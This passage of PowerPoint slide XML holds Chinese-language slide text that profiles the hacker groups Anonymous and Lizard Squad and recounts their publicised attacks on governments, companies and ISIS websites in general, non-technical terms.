          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No1:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ANONYMOUS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anonymous, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>匿名者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>全球最大的政治性黑客组织</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以对一些国家的政府网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和企业网站实施攻击而出名。在巴黎恐怖袭击事件发生之后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,Anonymous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第一时间在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>youtube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>上上传了视频</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>宣战。人们从此记住了这个组织</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>特别是那个戴着盖伊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>福克斯面具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Guy Fawkes masks:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>世纪英国革命英雄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Guy Fawkes(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>盖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>福克斯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的脸为原型而创造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的组织标志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>从此深入人心。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anonymous,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是一个开放性的网络黑客组织</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在美国</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>欧洲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>非洲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>南美等 世界各地都有其分部。该组织的宗旨是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>反对社会各行各业中存在的不公平现象。只要看到有这种现象的发生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>他们就会像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Guy Fawkes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>那样</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>把自己当作一个正义的战士</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>与不平等现象进行斗争。攻击山达基教会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>侵入五角大楼网络系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>由于拒绝给维基公司支付费用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>他们对 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visa(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>维萨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>),PayPal(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>贝宝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>),MasterCard(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>万事达</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等三家公司发动了攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>侵入了一些属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ISIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的网站等等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>这些就是该组织的 “辉煌事迹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No2 :	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIZARD SQUAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>该 组织热衷于攻击一些政府</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>大型企业的相关网站。在他们看来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击这些网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>才能体现出组织的高调姿态。其中就包括攻击马来西亚航空公司官网和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。他们对马来西亚航空公司网站实施攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使得该网站陷入了瘫痪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户在输入该网址后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>会出现一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>404-not-found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的界面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以致 无法查询航班信息。虽然</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>否认自己的网站遭到了攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>但</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lizard Squad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>确实对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使其在一段时间无法提供服务。该组织还攻击了索尼和微软两家公司</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>并在索尼公司的服务器上贴出了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ISIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的旗子。一些在美国和英国的该组织成员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>遭到了逮捕。原因是他们利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Xbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PlayStation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等娱乐设备发动了攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
